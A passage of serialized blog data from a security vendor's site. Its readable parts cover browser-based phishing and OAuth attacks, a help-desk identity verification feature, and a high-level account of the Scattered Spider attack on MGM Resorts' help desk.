"value":60567,"nodeType":173},{},[],{"data":86839,"content":86840,"nodeType":178},{},[86841],{"data":86842,"marks":86843,"value":60574,"nodeType":173},{},[],{"data":86845,"content":86846,"nodeType":231},{},[],{"data":86848,"content":86849,"nodeType":235},{},[86850],{"data":86851,"marks":86852,"value":60585,"nodeType":173},{},[86853],{"type":370},{"data":86855,"content":86856,"nodeType":178},{},[86857],{"data":86858,"marks":86859,"value":60592,"nodeType":173},{},[],{"data":86861,"content":86862,"nodeType":178},{},[86863,86866,86873,86876,86883],{"data":86864,"marks":86865,"value":60599,"nodeType":173},{},[],{"data":86867,"content":86868,"nodeType":186},{"uri":60115},[86869],{"data":86870,"marks":86871,"value":27706,"nodeType":173},{},[86872],{"type":194},{"data":86874,"marks":86875,"value":60610,"nodeType":173},{},[],{"data":86877,"content":86878,"nodeType":186},{"uri":60613},[86879],{"data":86880,"marks":86881,"value":27729,"nodeType":173},{},[86882],{"type":194},{"data":86884,"marks":86885,"value":60622,"nodeType":173},{},[],{"data":86887,"content":86888,"nodeType":178},{},[86889,86892,86899],{"data":86890,"marks":86891,"value":60629,"nodeType":173},{},[],{"data":86893,"content":86894,"nodeType":186},{"uri":60632},[86895],{"data":86896,"marks":86897,"value":60638,"nodeType":173},{},[86898],{"type":194},{"data":86900,"marks":86901,"value":60642,"nodeType":173},{},[],{"data":86903,"content":86904,"nodeType":178},{},[86905],{"data":86906,"marks":86907,"value":60649,"nodeType":173},{},[],{"data":86909,"content":86910,"nodeType":231},{},[],{"data":86912,"content":86913,"nodeType":169},{},[86914],{"data":86915,"marks":86916,"value":40632,"nodeType":173},{},[86917],{"type":370},{"data":86919,"content":86920,"nodeType":178},{},[86921],{"data":86922,"marks":86923,"value":60666,"nodeType":173},{},[],{"data":86925,"content":86926,"nodeType":178},{},[86927],{"data":86928,"marks":86929,"value":27202,"nodeType":173},{},[],{"data":86931,"content":86932,"nodeType":178},{},[86933,86936,86943],{"data":86934,"marks":86935,"value":59468,"nodeType":173},{},[],{"data":86937,"content":86938,"nodeType":186},{"uri":60681},[86939],{"data":86940,"marks":86941,"value":1472,"nodeType":173},{},[86942],{"type":194},{"data":86944,"marks":86945,"value":1477,"nodeType":173},{},[],{"entries":86947},{"hyperlink":86948,"inline":86949,"block":86950},[],[],[86951,86958,86961,86965,86970,86972,86976,86981],{"sys":86952,"__typename":5345,"title":86953,"caption":86953,"layoutMode":118,"file":86954},{"id":60129},"Attacks have shifted from targeting local networks to internet services, accessed through employee web browsers.",{"url":86955,"width":86956,"height":86957},"https://images.ctfassets.net/y1cdw1ablpvd/2TRbV3HLZRt0pjgxPAPUOY/5dbeec4b4ac16a3b450e1eff2add6266/1.png",1174,482,{"sys":86959,"__typename":5345,"title":78152,"caption":78153,"layoutMode":118,"file":86960},{"id":27196},{"url":78155,"width":78156,"height":78157},{"sys":86962,"__typename":5345,"title":86963,"caption":86963,"layoutMode":118,"file":86964},{"id":60215},"Phishing is now multi- and cross-channel, targeting a vast range of cloud and SaaS apps using flexible AitM toolkits — but all roads inevitably lead to the browser.",{"url":80141,"width":5358,"height":80142},{"sys":86966,"__typename":5345,"title":86967,"caption":86967,"layoutMode":118,"file":86968},{"id":60240},"AitM kits proxy information to the real site in order to complete the login process, passing MFA checks to steal the user’s session. ",{"url":86969,"width":51600,"height":75590},"https://images.ctfassets.net/y1cdw1ablpvd/Yo8TuzfyNcBWOIl34X1dS/2381e4e671039ddf61d03ef44fa45138/3.png",{"sys":86971,"__typename":15269,"type":15270,"ctaText":80152,"buttonLabel":80153,"buttonColour":15273,"buttonUrl":70840},{"id":60266},{"sys":86973,"__typename":5345,"title":72814,"caption":72814,"layoutMode":118,"file":86974},{"id":60350},{"url":86975,"width":5358,"height":72817},"https://images.ctfassets.net/y1cdw1ablpvd/3VSQ6bEHXlk0yJRal4R4oD/d3d6d281acfe22361a7d36719c4b0fa9/4.png",{"sys":86977,"__typename":5345,"title":86978,"caption":86978,"layoutMode":118,"file":86979},{"id":60404},"Consent phishing examples, where an attacker tricks the victim into authorizing an attacker-controlled app with risky permissions.",{"url":86980,"width":5358,"height":12098},"https://images.ctfassets.net/y1cdw1ablpvd/1Yx10JvyaLHI2DzhAjDgE0/886e807035dc8d005b9a6c84919a5a3f/5.png",{"sys":86982,"__typename":5345,"title":86983,"caption":86983,"layoutMode":118,"file":86984},{"id":60424},"The ongoing Salesforce attacks involve malicious OAuth apps being granted access to the victim’s Salesforce tenant. ",{"url":86985,"width":49185,"height":49186},"https://images.ctfassets.net/y1cdw1ablpvd/5JA9n2l57OlYE3jIcsYKv2/d7f1dcf15542f2df4045df1c3c61ba2e/6.png","content:blog:6-browser-based-attacks-every-security-team-should-be-prepared-for.json","blog/6-browser-based-attacks-every-security-team-should-be-prepared-for.json","blog/6-browser-based-attacks-every-security-team-should-be-prepared-for",{"_path":86990,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":86991,"ogImage":118,"summary":86993,"title":74477,"subtitle":118,"metaTitle":74477,"synopsis":74478,"hashTags":118,"publishedDate":74479,"slug":74480,"tagsCollection":87003,"relatedBlogPostsCollection":87009,"authorsCollection":88784,"content":88788,"_id":89502,"_type":5439,"_source":5440,"_file":89503,"_stem":89504,"_extension":5439},"/blog/how-the-browser-became-the-main-cyber-battleground",{"id":73710,"publishedAt":86992},"2025-09-19T06:36:25.810Z",{"json":86994},{"data":86995,"content":86996,"nodeType":165},{},[86997],{"data":86998,"content":86999,"nodeType":178},{},[87000],{"data":87001,"marks":87002,"value":74478,"nodeType":173},{},[],{"items":87004},[87005,87007],{"sys":87006,"name":509},{"id":508},{"sys":87008,"name":505},{"id":504},{"items":87010},[87011,87871,88224],{"__typename":1528,"sys":87012,"content":87013,"title":46296,"synopsis":82273,"hashTags":118,"publishedDate":82274,"slug":46297,"tagsCollection":87861,"authorsCollection":87867},{"id":24428},{"json":87014},{"nodeType":165,"data":87015,"content":87016},{},[87017,87023,87033,87043,87053,87063,87068,87084,87090,87103,87109,87114,87117,87124,87130,87136,87142,87147,87150,87157,87163,87179,87185,87191,87197,87203,87208,87214,87220,87226,87251,87257,87273,87279,87285,87301,87317,87333,87338,87344,87357,87363,87369,87375,87391,87398,87404,87410,87413,87420,87426,87432,87438,87477,87482,87488,87501,87578,87583,87589,87595,87652,87658,87664,87670,87675,87681,87687,87693,87698,87704,87710,87716,87721,87737,87743,87749,87788,87793,87796,87803,87823,87826,87833,87839,87845],{"nodeType":178,"data":87018,"content":87019},{},[87020],{"nodeType":173,"value":81303,"marks":87021,"data":87022},[],{},{"nodeType":178,"data":87024,"content":87025},{},[87026,87030],{"nodeType":173,"value":81310,"marks":87027,"data":87029},[87028],{"type":370},{},{"nodeType":173,"value":81315,"marks":87031,"data":87032},[],{},{"nodeType":178,"data":87034,"content":87035},{},[87036,87040],{"nodeType":173,"value":81322,"marks":87037,"data":87039},[87038],{"type":370},{},{"nodeType":173,"value":81327,"marks":87041,"data":87042},[],{},{"nodeType":178,"data":87044,"content":87045},{},[87046,87050],{"nodeType":173,"value":81334,"marks":87047,"data":87049},[87048],{"type":370},{},{"nodeType":173,"value":81339,"marks":87051,"data":87052},[],{},{"nodeType":178,"data":87054,"content":87055},{},[87056,87060],{"nodeType":173,"value":81346,"marks":87057,"data":87059},[87058],{"type":370},{},{"nodeType":173,"value":81351,"marks":87061,"data":87062},[],{},{"nodeType":312,"data":87064,"content":87067},{"target":87065},{"sys":87066},{"id":81358,"type":317,"linkType":318},[],{"nodeType":178,"data":87069,"content":87070},{},[87071,87074,87081],{"nodeType":173,"value":81364,"marks":87072,"data":87073},[],{},{"nodeType":186,"data":87075,"content":87076},{"uri":63182},[87077],{"nodeType":173,"value":81371,"marks":87078,"data":87080},[87079],{"type":194},{},{"nodeType":173,"value":81376,"marks":87082,"data":87083},[],{},{"nodeType":178,"data":87085,"content":87086},{},[87087],{"nodeType":173,"value":81383,"marks":87088,"data":87089},[],{},{"nodeType":178,"data":87091,"content":87092},{},[87093,87096,87100],{"nodeType":173,"value":81390,"marks":87094,"data":87095},[],{},{"nodeType":173,"value":19231,"marks":87097,"data":87099},[87098],{"type":370},{},{"nodeType":173,"value":81398,"marks":87101,"data":87102},[],{},{"nodeType":178,"data":87104,"content":87105},{},[87106],{"nodeType":173,"value":81405,"marks":87107,"data":87108},[],{},{"nodeType":312,"data":87110,"content":87113},{"target":87111},{"sys":87112},{"id":81412,"type":317,"linkType":318},[],{"nodeType":231,"data":87115,"content":87116},{},[],{"nodeType":169,"data":87118,"content":87119},{},[87120],{"nodeType":173,"value":81421,"marks":87121,"data":87123},[87122],{"type":370},{},{"nodeType":178,"data":87125,"content":87126},{},[87127],{"nodeType":173,"value":81429,"marks":87128,"data":87129},[],{},{"nodeType":178,"data":87131,"content":87132},{},[87133],{"nodeType":173,"value":81436,"marks":87134,"data":87135},[],{},{"nodeType":178,"data":87137,"content":87138},{},[87139],{"nodeType":173,"value":81443,"marks":87140,"data":87141},[],{},{"nodeType":312,"data":87143,"content":87146},{"target":87144},{"sys":87145},{"id":81450,"type":317,"linkType":318},[],{"nodeType":231,"data":87148,"content":87149},{},[],{"nodeType":169,"data":87151,"content":87152},{},[87153],{"nodeType":173,"value":81459,"marks":87154,"data":87156},[87155],{"type":370},{},{"nodeType":178,"data":87158,"content":87159},{},[87160],{"nodeType":173,"value":81467,"marks":87161,"data":87162},[],{},{"nodeType":178,"data":87164,"content":87165},{},[87166,87169,87176],{"nodeType":173,"value":81474,"marks":87167,"data":87168},[],{},{"nodeType":186,"data":87170,"content":87171},{"uri":77262},[87172],{"nodeType":173,"value":81481,"marks":87173,"data":87175},[87174],{"type":194},{},{"nodeType":173,"value":81486,"marks":87177,"data":87178},[],{},{"nodeType":178,"data":87180,"content":87181},{},[87182],{"nodeType":173,"value":81493,"marks":87183,"data":87184},[],{},{"nodeType":178,"data":87186,"content":87187},{},[87188],{"nodeType":173,"value":81500,"marks":87189,"data":87190},[],{},{"nodeType":235,"data":87192,"content":87193},{},[87194],{"nodeType":173,"value":81507,"marks":87195,"data":87196},[],{},{"nodeType":178,"data":87198,"content":87199},{},[87200],{"nodeType":173,"value":81514,"marks":87201,"data":87202},[],{},{"nodeType":312,"data":87204,"content":87207},{"target":87205},{"sys":87206},{"id":81521,"type":317,"linkType":318},[],{"nodeType":178,"data":87209,"content":87210},{},[87211],{"nodeType":173,"value":81527,"marks":87212,"data":87213},[],{},{"nodeType":235,"data":87215,"content":87216},{},[87217],{"nodeType":173,"value":81534,"marks":87218,"data":87219},[],{},{"nodeType":178,"data":87221,"content":87222},{},[87223],{"nodeType":173,"value":81541,"marks":87224,"data":87225},[],{},{"nodeType":178,"data":87227,"content":87228},{},[87229,87232,87240,87244,87247],{"nodeType":173,"value":81548,"marks":87230,"data":87231},[],{},{"nodeType":186,"data":87233,"content":87234},{"uri":81553},[87235],{"nodeType":173,"value":81556,"marks":87236,"data":87239},[87237,87238],{"type":194},{"type":370},{},{"nodeType":173,"value":3107,"marks":87241,"data":87243},[87242],{"type":370},{},{"nodeType":173,"value":81566,"marks":87245,"data":87246},[],{},{"nodeType":173,"value":73803,"marks":87248,"data":87250},[87249],{"type":370},{},{"nodeType":178,"data":87252,"content":87253},{},[87254],{"nodeType":173,"value":81577,"marks":87255,"data":87256},[],{},{"nodeType":178,"data":87258,"content":87259},{},[87260,87263,87270],{"nodeType":173,"value":81584,"marks":87261,"data":87262},[],{},{"nodeType":186,"data":87264,"content":87265},{"uri":63182},[87266],{"nodeType":173,"value":25071,"marks":87267,"data":87269},[87268],{"type":194},{},{"nodeType":173,"value":81595,"marks":87271,"data":87272},[],{},{"nodeType":235,"data":87274,"content":87275},{},[87276],{"nodeType":173,"value":81602,"marks":87277,"data":87278},[],{},{"nodeType":178,"data":87280,"content":87281},{},[87282],{"nodeType":173,"value":81609,"marks":87283,"data":87284},[],{},{"nodeType":178,"data":87286,"content":87287},{},[87288,87291,87298],{"nodeType":173,"value":81616,"marks":87289,"data":87290},[],{},{"nodeType":186,"data":87292,"content":87293},{"uri":81621},[87294],{"nodeType":173,"value":81624,"marks":87295,"data":87297},[87296],{"type":194},{},{"nodeType":173,"value":81629,"marks":87299,"data":87300},[],{},{"nodeType":178,"data":87302,"content":87303},{},[87304,87307,87314],{"nodeType":173,"value":81636,"marks":87305,"data":87306},[],{},{"nodeType":186,"data":87308,"content":87309},{"uri":81641},[87310],{"nodeType":173,"value":81644,"marks":87311,"data":87313},[87312],{"type":194},{},{"nodeType":173,"value":81649,"marks":87315,"data":87316},[],{},{"nodeType":178,"data":87318,"content":87319},{},[87320,87323,87330],{"nodeType":173,"value":81656,"marks":87321,"data":87322},[],{},{"nodeType":186,"data":87324,"content":87325},{"uri":75099},[87326],{"nodeType":173,"value":81663,"marks":87327,"data":87329},[87328],{"type":194},{},{"nodeType":173,"value":81668,"marks":87331,"data":87332},[],{},{"nodeType":312,"data":87334,"content":87337},{"target":87335},{"sys":87336},{"id":81675,"type":317,"linkType":318},[],{"nodeType":235,"data":87339,"content":87340},{},[87341],{"nodeType":173,"value":81681,"marks":87342,"data":87343},[],{},{"nodeType":178,"data":87345,"content":87346},{},[87347,87350,87354],{"nodeType":173,"value":81688,"marks":87348,"data":87349},[],{},{"nodeType":173,"value":81692,"marks":87351,"data":87353},[87352],{"type":1646},{},{"nodeType":173,"value":81697,"marks":87355,"data":87356},[],{},{"nodeType":178,"data":87358,"content":87359},{},[87360],{"nodeType":173,"value":81704,"marks":87361,"data":87362},[],{},{"nodeType":178,"data":87364,"content":87365},{},[87366],{"nodeType":173,"value":81711,"marks":87367,"data":87368},[],{},{"nodeType":178,"data":87370,"content":87371},{},[87372],{"nodeType":173,"value":81718,"marks":87373,"data":87374},[],{},{"nodeType":178,"data":87376,"content":87377},{},[87378,87381,87388],{"nodeType":173,"value":81725,"marks":87379,"data":87380},[],{},{"nodeType":186,"data":87382,"content":87383},{"uri":832},[87384],{"nodeType":173,"value":81732,"marks":87385,"data":87387},[87386],{"type":194},{},{"nodeType":173,"value":81737,"marks":87389,"data":87390},[],{},{"nodeType":178,"data":87392,"content":87393},{},[87394],{"nodeType":173,"value":81744,"marks":87395,"data":87397},[87396],{"type":370},{},{"nodeType":178,"data":87399,"content":87400},{},[87401],{"nodeType":173,"value":81752,"marks":87402,"data":87403},[],{},{"nodeType":178,"data":87405,"content":87406},{},[87407],{"nodeType":173,"value":81759,"marks":87408,"data":87409},[],{},{"nodeType":231,"data":87411,"content":87412},{},[],{"nodeType":169,"data":87414,"content":87415},{},[87416],{"nodeType":173,"value":81769,"marks":87417,"data":87419},[87418],{"type":370},{},{"nodeType":178,"data":87421,"content":87422},{},[87423],{"nodeType":173,"value":81777,"marks":87424,"data":87425},[],{},{"nodeType":178,"data":87427,"content":87428},{},[87429],{"nodeType":173,"value":81784,"marks":87430,"data":87431},[],{},{"nodeType":178,"data":87433,"content":87434},{},[87435],{"nodeType":173,"value":81791,"marks":87436,"data":87437},[],{},{"nodeType":250,"data":87439,"content":87440},{},[87441,87450,87459,87468],{"nodeType":254,"data":87442,"content":87443},{},[87444],{"nodeType":178,"data":87445,"content":87446},{},[87447],{"nodeType":173,"value":81804,"marks":87448,"data":87449},[],{},{"nodeType":254,"data":87451,"content":87452},{},[87453],{"nodeType":178,"data":87454,"content":87455},{},[87456],{"nodeType":173,"value":81814,"marks":87457,"data":87458},[],{},{"nodeType":254,"data":87460,"content":87461},{},[87462],{"nodeType":178,"data":87463,"content":87464},{},[87465],{"nodeType":173,"value":81824,"marks":87466,"data":87467},[],{},{"nodeType":254,"data":87469,"content":87470},{},[87471],{"nodeType":178,"data":87472,"content":87473},{},[87474],{"nodeType":173,"value":81834,"marks":87475,"data":87476},[],{},{"nodeType":312,"data":87478,"content":87481},{"target":87479},{"sys":87480},{"id":81841,"type":317,"linkType":318},[],{"nodeType":178,"data":87483,"content":87484},{},[87485],{"nodeType":173,"value":81847,"marks":87486,"data":87487},[],{},{"nodeType":178,"data":87489,"content":87490},{},[87491,87494,87498],{"nodeType":173,"value":81854,"marks":87492,"data":87493},[],{},{"nodeType":173,"value":19231,"marks":87495,"data":87497},[87496],{"type":370},{},{"nodeType":173,"value":81862,"marks":87499,"data":87500},[],{},{"nodeType":250,"data":87502,"content":87503},{},[87504,87533,87542,87551,87560,87569],{"nodeType":254,"data":87505,"content":87506},{},[87507],{"nodeType":178,"data":87508,"content":87509},{},[87510,87513,87520,87523,87530],{"nodeType":173,"value":81875,"marks":87511,"data":87512},[],{},{"nodeType":186,"data":87514,"content":87515},{"uri":81880},[87516],{"nodeType":173,"value":81883,"marks":87517,"data":87519},[87518],{"type":194},{},{"nodeType":173,"value":81888,"marks":87521,"data":87522},[],{},{"nodeType":186,"data":87524,"content":87525},{"uri":81893},[87526],{"nodeType":173,"value":81896,"marks":87527,"data":87529},[87528],{"type":194},{},{"nodeType":173,"value":81901,"marks":87531,"data":87532},[],{},{"nodeType":254,"data":87534,"content":87535},{},[87536],{"nodeType":178,"data":87537,"content":87538},{},[87539],{"nodeType":173,"value":81911,"marks":87540,"data":87541},[],{},{"nodeType":254,"data":87543,"content":87544},{},[87545],{"nodeType":178,"data":87546,"content":87547},{},[87548],{"nodeType":173,"value":81921,"marks":87549,"data":87550},[],{},{"nodeType":254,"data":87552,"content":87553},{},[87554],{"nodeType":178,"data":87555,"content":87556},{},[87557],{"nodeType":173,"value":81931,"marks":87558,"data":87559},[],{},{"nodeType":254,"data":87561,"content":87562},{},[87563],{"nodeType":178,"data":87564,"content":87565},{},[87566],{"nodeType":173,"value":81941,"marks":87567,"data":87568},[],{},{"nodeType":254,"data":87570,"content":87571},{},[87572],{"nodeType":178,"data":87573,"content":87574},{},[87575],{"nodeType":173,"value":81951,"marks":87576,"data":87577},[],{},{"nodeType":312,"data":87579,"content":87582},{"target":87580},{"sys":87581},{"id":81958,"type":317,"linkType":318},[],{"nodeType":235,"data":87584,"content":87585},{},[87586],{"nodeType":173,"value":81964,"marks":87587,"data":87588},[],{},{"nodeType":178,"data":87590,"content":87591},{},[87592],{"nodeType":173,"value":81971,"marks":87593,"data":87594},[],{},{"nodeType":250,"data":87596,"content":87597},{},[87598,87607,87616,87625,87634,87643],{"nodeType":254,"data":87599,"content":87600},{},[87601],{"nodeType":178,"data":87602,"content":87603},{},[87604],{"nodeType":173,"value":81984,"marks":87605,"data":87606},[],{},{"nodeType":254,"data":87608,"content":87609},{},[87610],{"nodeType":178,"data":87611,"content":87612},{},[87613],{"nodeType":173,"value":81994,"marks":87614,"data":87615},[],{},{"nodeType":254,"data":87617,"content":87618},{},[87619],{"nodeType":178,"data":87620,"content":87621},{},[87622],{"nodeType":173,"value":82004,"marks":87623,"data":87624},[],{},{"nodeType":254,"data":87626,"content":87627},{},[87628],{"nodeType":178,"data":87629,"content":87630},{},[87631],{"nodeType":173,"value":82014,"marks":87632,"data":87633},[],{},{"nodeType":254,"data":87635,"content":87636},{},[87637],{"nodeType":178,"data":87638,"content":87639},{},[87640],{"nodeType":173,"value":82024,"marks":87641,"data":87642},[],{},{"nodeType":254,"data":87644,"content":87645},{},[87646],{"nodeType":178,"data":87647,"content":87648},{},[87649],{"nodeType":173,"value":82034,"marks":87650,"data":87651},[],{},{"nodeType":178,"data":87653,"content":87654},{},[87655],{"nodeType":173,"value":82041,"marks":87656,"data":87657},[],{},{"nodeType":178,"data":87659,"content":87660},{},[87661],{"nodeType":173,"value":82048,"marks":87662,"data":87663},[],{},{"nodeType":178,"data":87665,"content":87666},{},[87667],{"nodeType":173,"value":82055,"marks":87668,"data":87669},[],{},{"nodeType":312,"data":87671,"content":87674},{"target":87672},{"sys":87673},{"id":82062,"type":317,"linkType":318},[],{"nodeType":178,"data":87676,"content":87677},{},[87678],{"nodeType":173,"value":82068,"marks":87679,"data":87680},[],{},{"nodeType":235,"data":87682,"content":87683},{},[87684],{"nodeType":173,"value":82075,"marks":87685,"data":87686},[],{},{"nodeType":178,"data":87688,"content":87689},{},[87690],{"nodeType":173,"value":82082,"marks":87691,"data":87692},[],{},{"nodeType":312,"data":87694,"content":87697},{"target":87695},{"sys":87696},{"id":82089,"type":317,"linkType":318},[],{"nodeType":235,"data":87699,"content":87700},{},[87701],{"nodeType":173,"value":82095,"marks":87702,"data":87703},[],{},{"nodeType":178,"data":87705,"content":87706},{},[87707],{"nodeType":173,"value":82102,"marks":87708,"data":87709},[],{},{"nodeType":178,"data":87711,"content":87712},{},[87713],{"nodeType":173,"value":82109,"marks":87714,"data":87715},[],{},{"nodeType":312,"data":87717,"content":87720},{"target":87718},{"sys":87719},{"id":82116,"type":317,"linkType":318},[],{"nodeType":178,"data":87722,"content":87723},{},[87724,87727,87734],{"nodeType":173,"value":82122,"marks":87725,"data":87726},[],{},{"nodeType":186,"data":87728,"content":87729},{"uri":74370},[87730],{"nodeType":173,"value":82129,"marks":87731,"data":87733},[87732],{"type":194},{},{"nodeType":173,"value":82134,"marks":87735,"data":87736},[],{},{"nodeType":235,"data":87738,"content":87739},{},[87740],{"nodeType":173,"value":82141,"marks":87741,"data":87742},[],{},{"nodeType":178,"data":87744,"content":87745},{},[87746],{"nodeType":173,"value":82148,"marks":87747,"data":87748},[],{},{"nodeType":250,"data":87750,"content":87751},{},[87752,87761,87770,87779],{"nodeType":254,"data":87753,"content":87754},{},[87755],{"nodeType":178,"data":87756,"content":87757},{},[87758],{"nodeType":173,"value":82161,"marks":87759,"data":87760},[],{},{"nodeType":254,"data":87762,"content":87763},{},[87764],{"nodeType":178,"data":87765,"content":87766},{},[87767],{"nodeType":173,"value":82171,"marks":87768,"data":87769},[],{},{"nodeType":254,"data":87771,"content":87772},{},[87773],{"nodeType":178,"data":87774,"content":87775},{},[87776],{"nodeType":173,"value":82181,"marks":87777,"data":87778},[],{},{"nodeType":254,"data":87780,"content":87781},{},[87782],{"nodeType":178,"data":87783,"content":87784},{},[87785],{"nodeType":173,"value":82191,"marks":87786,"data":87787},[],{},{"nodeType":312,"data":87789,"content":87792},{"target":87790},{"sys":87791},{"id":82198,"type":317,"linkType":318},[],{"nodeType":231,"data":87794,"content":87795},{},[],{"nodeType":169,"data":87797,"content":87798},{},[87799],{"nodeType":173,"value":82207,"marks":87800,"data":87802},[87801],{"type":370},{},{"nodeType":178,"data":87804,"content":87805},{},[87806,87809,87816,87819],{"nodeType":173,"value":82215,"marks":87807,"data":87808},[],{},{"nodeType":186,"data":87810,"content":87811},{"uri":82220},[87812],{"nodeType":173,"value":82223,"marks":87813,"data":87815},[87814],{"type":194},{},{"nodeType":173,"value":2936,"marks":87817,"data":87818},[],{},{"nodeType":173,"value":82231,"marks":87820,"data":87822},[87821],{"type":370},{},{"nodeType":231,"data":87824,"content":87825},{},[],{"nodeType":169,"data":87827,"content":87828},{},[87829],{"nodeType":173,"value":2824,"marks":87830,"data":87832},[87831],{"type":370},{},{"nodeType":178,"data":87834,"content":87835},{},[87836],{"nodeType":173,"value":70343,"marks":87837,"data":87838},[],{},{"nodeType":178,"data":87840,"content":87841},{},[87842],{"nodeType":173,"value":70350,"marks":87843,"data":87844},[],{},{"nodeType":178,"data":87846,"content":87847},{},[87848,87851,87858],{"nodeType":173,"value":61741,"marks":87849,"data":87850},[],{},{"nodeType":186,"data":87852,"content":87853},{"uri":473},[87854],{"nodeType":173,"value":70364,"marks":87855,"data":87857},[87856],{"type":194},{},{"nodeType":173,"value":37,"marks":87859,"data":87860},[],{},{"items":87862},[87863,87865],{"sys":87864,"name":509},{"id":508},{"sys":87866,"name":505},{"id":504},{"items":87868},[87869],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":87870},{"url":2911},{"__typename":1528,"sys":87872,"content":87873,"title":46338,"synopsis":88214,"hashTags":118,"publishedDate":88215,"slug":46339,"tagsCollection":88216,"authorsCollection":88220},{"id":25128},{"json":87874},{"nodeType":165,"data":87875,"content":87876},{},[87877,87884,87891,87898,87904,87911,87944,87951,87958,87965,87971,87978,87985,88003,88009,88016,88036,88054,88061,88068,88075,88082,88089,88096,88103,88123,88130,88137,88143,88150,88157,88177,88183,88202,88208],{"nodeType":178,"data":87878,"content":87879},{},[87880],{"nodeType":173,"value":87881,"marks":87882,"data":87883},"Scattered Spider has shown the world the devastating effects attackers can achieve by socially engineering IT help desks into performing MFA resets so they can take over accounts on sensitive corporate apps. ",[],{},{"nodeType":178,"data":87885,"content":87886},{},[87887],{"nodeType":173,"value":87888,"marks":87889,"data":87890},"That’s why we’re introducing Employee Identity Verification Codes — a simple, browser-based identity check that gives your help desk a reliable way to confirm they’re talking to someone from your organization.",[],{},{"nodeType":178,"data":87892,"content":87893},{},[87894],{"nodeType":173,"value":87895,"marks":87896,"data":87897},"Push now provides your employees with a rotating 6-digit verification code in their browser via the Push Security extension. When an employee contacts your IT help desk to request an MFA reset or access recovery, the help desk can ask for this code to verify their identity — ensuring it’s really them, and not an attacker.",[],{},{"nodeType":312,"data":87899,"content":87903},{"target":87900},{"sys":87901},{"id":87902,"type":317,"linkType":318},"3PkiGgzwSt9Nb5rsGRiQVZ",[],{"nodeType":178,"data":87905,"content":87906},{},[87907],{"nodeType":173,"value":87908,"marks":87909,"data":87910},"The employee identity verification codes are:",[],{},{"nodeType":250,"data":87912,"content":87913},{},[87914,87924,87934],{"nodeType":254,"data":87915,"content":87916},{},[87917],{"nodeType":178,"data":87918,"content":87919},{},[87920],{"nodeType":173,"value":87921,"marks":87922,"data":87923},"Session-aware - generated in users’ browsers and only visible to them when they click on the Push Security extension icon in their browser toolbar.",[],{},{"nodeType":254,"data":87925,"content":87926},{},[87927],{"nodeType":178,"data":87928,"content":87929},{},[87930],{"nodeType":173,"value":87931,"marks":87932,"data":87933},"Rotating: they change every 24 hours",[],{},{"nodeType":254,"data":87935,"content":87936},{},[87937],{"nodeType":178,"data":87938,"content":87939},{},[87940],{"nodeType":173,"value":87941,"marks":87942,"data":87943},"Lightweight: no additional apps or devices required",[],{},{"nodeType":178,"data":87945,"content":87946},{},[87947],{"nodeType":173,"value":87948,"marks":87949,"data":87950},"It’s a fast, simple verification method — directly in the employee’s browser — that addresses a real-world threat.",[],{},{"nodeType":169,"data":87952,"content":87953},{},[87954],{"nodeType":173,"value":87955,"marks":87956,"data":87957},"We think it’s swell, but don’t just take our word for it …",[],{},{"nodeType":178,"data":87959,"content":87960},{},[87961],{"nodeType":173,"value":87962,"marks":87963,"data":87964},"Eric Rubin — a Senior Manager in GitLab’s Corporate Security team — has already rolled out Employee Identity Verification Codes across his workforce. Here’s what he had to say about it:",[],{},{"nodeType":312,"data":87966,"content":87970},{"target":87967},{"sys":87968},{"id":87969,"type":317,"linkType":318},"5ZLaA869NXpMjVwkswEyOB",[],{"nodeType":178,"data":87972,"content":87973},{},[87974],{"nodeType":173,"value":87975,"marks":87976,"data":87977},"Thank you, Eric!",[],{},{"nodeType":169,"data":87979,"content":87980},{},[87981],{"nodeType":173,"value":87982,"marks":87983,"data":87984},"Why are help desk identity verification methods so hot right now?",[],{},{"nodeType":178,"data":87986,"content":87987},{},[87988,87992,87999],{"nodeType":173,"value":87989,"marks":87990,"data":87991},"A number of the high-profile incidents attributed to the ",[],{},{"nodeType":186,"data":87993,"content":87994},{"uri":63182},[87995],{"nodeType":173,"value":87996,"marks":87997,"data":87998},"Scattered Spider cybercriminal group",[],{},{"nodeType":173,"value":88000,"marks":88001,"data":88002}," saw them socially engineer IT help desks into resetting MFA on employee accounts that they had already acquired valid credentials for. These compromised accounts were typically on IdP systems like Okta providing SSO access to large numbers of downstream applications.",[],{},{"nodeType":312,"data":88004,"content":88008},{"target":88005},{"sys":88006},{"id":88007,"type":317,"linkType":318},"2F2dpOkyXWnrKgFC3dSl67",[],{"nodeType":235,"data":88010,"content":88011},{},[88012],{"nodeType":173,"value":88013,"marks":88014,"data":88015},"Case study: The MGM Resorts breach",[],{},{"nodeType":178,"data":88017,"content":88018},{},[88019,88023,88032],{"nodeType":173,"value":88020,"marks":88021,"data":88022},"One of Scattered Spider’s most notorious and well-documented attacks was against ",[],{},{"nodeType":186,"data":88024,"content":88026},{"uri":88025},"https://pushsecurity.com/blog/identity-attacks-in-the-wild/#id-mgm-resorts-september-2023",[88027],{"nodeType":173,"value":88028,"marks":88029,"data":88031},"MGM Resorts",[88030],{"type":194},{},{"nodeType":173,"value":88033,"marks":88034,"data":88035},". Scattered Spider socially engineered MGM Resorts’ help desk personnel to bypass MFA and log in to accounts for which they had acquired valid login credentials via credential phishing and historical infostealer compromises. ",[],{},{"nodeType":178,"data":88037,"content":88038},{},[88039,88043,88050],{"nodeType":173,"value":88040,"marks":88041,"data":88042},"They specifically targeted accounts with Super Administrator privileges within MGM Resorts’ Okta tenant, which they then used to register a second, attacker-controlled IdP via ",[],{},{"nodeType":186,"data":88044,"content":88045},{"uri":989},[88046],{"nodeType":173,"value":992,"marks":88047,"data":88049},[88048],{"type":194},{},{"nodeType":173,"value":88051,"marks":88052,"data":88053},". This then enabled them to impersonate any user within the Okta tenant. ",[],{},{"nodeType":178,"data":88055,"content":88056},{},[88057],{"nodeType":173,"value":88058,"marks":88059,"data":88060},"The attackers were then able to abuse SSO access to downstream apps and platforms from various accounts, culminating in deployment of ransomware to around 100 ESXi servers and data exfiltration. ",[],{},{"nodeType":178,"data":88062,"content":88063},{},[88064],{"nodeType":173,"value":88065,"marks":88066,"data":88067},"The breach resulted in a 36-hour outage, a $100M hit to its Q3 results, one-time cyber consulting fees in the region of $10M, and a class-action lawsuit later settled for $45M. ",[],{},{"nodeType":235,"data":88069,"content":88070},{},[88071],{"nodeType":173,"value":88072,"marks":88073,"data":88074},"Reassessing help desk verification processes",[],{},{"nodeType":178,"data":88076,"content":88077},{},[88078],{"nodeType":173,"value":88079,"marks":88080,"data":88081},"Scattered Spider’s 